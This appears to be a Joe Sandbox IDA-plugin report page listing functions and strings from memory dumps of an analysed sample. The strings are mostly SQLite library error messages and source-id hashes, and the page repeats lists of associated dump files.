Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: temp$wrong number of vtable arguments
API String ID: 0-2849069181
Opcode ID: 4fc408cc8294c683890dd5a59a06d16dacc4e5e49f1786f05bdb323be7917b84
Instruction ID: 2ca27d29bc0766a4e66864e477c860ad19b18612974d0e7c589a010fc08dea84
Opcode Fuzzy Hash: 4fc408cc8294c683890dd5a59a06d16dacc4e5e49f1786f05bdb323be7917b84
Instruction Fuzzy Hash: 3651D3B59087458FC754CF14D4805AABBF1FF89328F444AAEE58A57312D332E94ACB93

Function 1D80C640 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D80C7EC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D80C785, 1D80C791, 1D80C7DD
database corruption, xrefs: 1D80C7E7

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 51a97bf93f92d1731c89a927928bd42502261f296b6697b85fab7de6965d2f2a
Instruction ID: 2a70bc5bfbb8e0ddc3f80e9c773eada5d86f8bbecd76d1261e36e02f69419679
Opcode Fuzzy Hash: 51a97bf93f92d1731c89a927928bd42502261f296b6697b85fab7de6965d2f2a
Instruction Fuzzy Hash: 745197756083419FC308CF19C89086ABBF1FF99204F58899EF5969B312D331E956CBA3

Function 1D7735E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D7735F4
%s at line %d of [%.10s], xrefs: 1D7735F9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7735EA

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 0fccc5cc6c39f1db60d449d0f965cce218729b27625459fdb5463246133c9d45
Instruction ID: d6b6a62a4512dd3190f8cfe05ba8e01a3aee0fa1c4a8a847362cef314f640388
Opcode Fuzzy Hash: 0fccc5cc6c39f1db60d449d0f965cce218729b27625459fdb5463246133c9d45
Instruction Fuzzy Hash: 0E51D3F5A04315AFDF048F14C8C9A66BBA5FF44734F054A6AE9699B252E331E810CBD3

Function 1D7E96B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7E97EF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7E97E0
database corruption, xrefs: 1D7E97EA

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 7f558baacdde4bbfe4a790940a9cbc97563bb8ed30702ef6c376378ee469adc2
Instruction ID: 032381155049000afb943b30c65d925241a99a281a263553b4d658116fe2b0b5
Opcode Fuzzy Hash: 7f558baacdde4bbfe4a790940a9cbc97563bb8ed30702ef6c376378ee469adc2
Instruction Fuzzy Hash: F541F5772047A08AD7218F6CD4406E6FFE0AF51261F1848AFD2D98B652E322E485D352

Function 1D740300 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON

Download Yara Rule

Strings

winWrite1, xrefs: 1D74045E
winWrite2, xrefs: 1D74043B
delayed %dms for lock/sharing conflict at line %d, xrefs: 1D7403FF

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 0-1808655853
Opcode ID: 386b8c0fd6857c9e4d907a2ef9ab6c4fedd4f361fd34b0d5bbd7d58df73628ea
Instruction ID: 86164f49b91a5e02418795d78ee7e7be2a64fb524f2e6b4b5b585b297a1bc35c
Opcode Fuzzy Hash: 386b8c0fd6857c9e4d907a2ef9ab6c4fedd4f361fd34b0d5bbd7d58df73628ea
Instruction Fuzzy Hash: 3E412771A043229BC3169F28C880ABFBBA4FB86220F718B6FFA15C7151D331D1458B93

Function 1D8B5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D8B5980
%s at line %d of [%.10s], xrefs: 1D8B5985
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8B5976

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: b8334be6e7306cf360d8e39995da1d85013b1d3c844bfae71aa4988f0c01ec33
Instruction ID: 6e698a9136eb54ec2a45f22a30ea30c101bfabcf8f32aeed8e3396617fdc3974
Opcode Fuzzy Hash: b8334be6e7306cf360d8e39995da1d85013b1d3c844bfae71aa4988f0c01ec33
Instruction Fuzzy Hash: D0411775904351AFD310DB18DC80BAAB7E4BF85320F8515A9F988A7351E329F998C7A3

Function 1D80D2E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D80D306
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D80D2F7
database corruption, xrefs: 1D80D301

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1bd243e3b10ce3d98be62cd3ee88707b97d11e8639cc4aa9ca94dff7f35f8549
Instruction ID: 26317225c0b5756091ad9560df35f9a072b3498723aa51605065ed1cadb943d1
Opcode Fuzzy Hash: 1bd243e3b10ce3d98be62cd3ee88707b97d11e8639cc4aa9ca94dff7f35f8549
Instruction Fuzzy Hash: 3331E6B65046116FD7119E18DC40EABB7A8EF84764F060429FA4997622E621E9418B93

Function 1D8C8850 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 1D8C88E2
delayed %dms for lock/sharing conflict at line %d, xrefs: 1D8C895F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
API String ID: 0-1037342196
Opcode ID: de432457a2c1527251b8bf42fedeff9279415f1e19558f9b02ce012932d9847a
Instruction ID: e2bd4c45e22ba2e79fa2ad3414e55d17c831df3cdb4af1b516a4f9c0f149b8dd
Opcode Fuzzy Hash: de432457a2c1527251b8bf42fedeff9279415f1e19558f9b02ce012932d9847a
Instruction Fuzzy Hash: C8213575648346EFD7209B14DD84BFBBBE9ABC4304F584C6CE688871A3C239E8448793

Function 1D775390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D77540D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7753FE
database corruption, xrefs: 1D775408

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1e9a38d25d72804d38054755aa5aaa422c4b5da0aa2907e996c8382f1a57dcb0
Instruction ID: 431ea5b22d31fbfd8d9f86d7885ed9f35aa6f0a56a3a207985e3f877dc741697
Opcode Fuzzy Hash: 1e9a38d25d72804d38054755aa5aaa422c4b5da0aa2907e996c8382f1a57dcb0
Instruction Fuzzy Hash: 323123696447D186DB218B28D8447B6B7E09F41726F040C6EE9C987692E322F492C3A3

Function 1D857ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

error in tokenizer constructor, xrefs: 1D857F92
no such tokenizer: %s, xrefs: 1D857F1B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: c0267b966ab554e456d85110040848accf7a41413a8be754b23d95854c116905
Instruction ID: 7d6e3956ef0259aa40feaab727a618ff4a69675604ae6765d1e4d5564865f369
Opcode Fuzzy Hash: c0267b966ab554e456d85110040848accf7a41413a8be754b23d95854c116905
Instruction Fuzzy Hash: D7319E7A7002159FCB20DF19DC80A6AB3E4EF84665F15856DF989DB301E332E805CBA2

Function 1D774130 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D77425D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7741A3, 1D7741EE, 1D7741FE, 1D77424E
database corruption, xrefs: 1D774258

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 4a96947b074692edf34c857c5241046a44f685d4ed371db91c5926a210eb71b7
Instruction ID: 403aab4731124aa66adeda569f86427931b70a082553a1af779dc4e44ddb6370
Opcode Fuzzy Hash: 4a96947b074692edf34c857c5241046a44f685d4ed371db91c5926a210eb71b7
Instruction Fuzzy Hash: E831403160836156C714DE1DDC404B5BBE1EBC122AF058A7FF9E5DB2C2D638E554C792

Function 1D781420 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D78147A
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D78146B
database corruption, xrefs: 1D781475

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c863288f10aed6caada684b8caff4b393b0024fb782bc8157028fd976f188215
Instruction ID: 3caa74ce51779301747e3ccdb277a4423166c2878c35ba34487edf67d3834a91
Opcode Fuzzy Hash: c863288f10aed6caada684b8caff4b393b0024fb782bc8157028fd976f188215
Instruction Fuzzy Hash: 6C31B1B56093918FC310CF29D940967FBF0EF85225F04869EE8CA8BA53D731E549CBA1

Function 1D7F0010 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7F009B
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7F008C, 1D7F00C2, 1D7F00FE
database corruption, xrefs: 1D7F0096

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 46a87333eb9edc334f59b4c9dfd23db63258bb7fe0f1a784e8ae08b23238487a
Instruction ID: bfd514c5b8d4fa9a18778624763f4876d3ce8f34814f74a4a8c0ac6c50eea352
Opcode Fuzzy Hash: 46a87333eb9edc334f59b4c9dfd23db63258bb7fe0f1a784e8ae08b23238487a
Instruction Fuzzy Hash: DB3126712083A18AC722CE18DC805B6FBE1EFC1222B44896FE5A5CB382D234E549C763

Function 1D73F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 1D73F0C4

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: e8d5cb06607be1637894a2f77495e64f9b47f78663a592a3e90c233af6d8731a
Instruction ID: 3198f32f83c4d53d896311519cd64070188ae38f5e9813c66725f54ec35d5daf
Opcode Fuzzy Hash: e8d5cb06607be1637894a2f77495e64f9b47f78663a592a3e90c233af6d8731a
Instruction Fuzzy Hash: 23313977904202BBCB109E18EC41726B3A0BF40772F948555F999A7292E732FD548693

Function 1D7505D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

rbu/zipvfs setup error, xrefs: 1D75061A
rbu(%s)/%z, xrefs: 1D750697

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
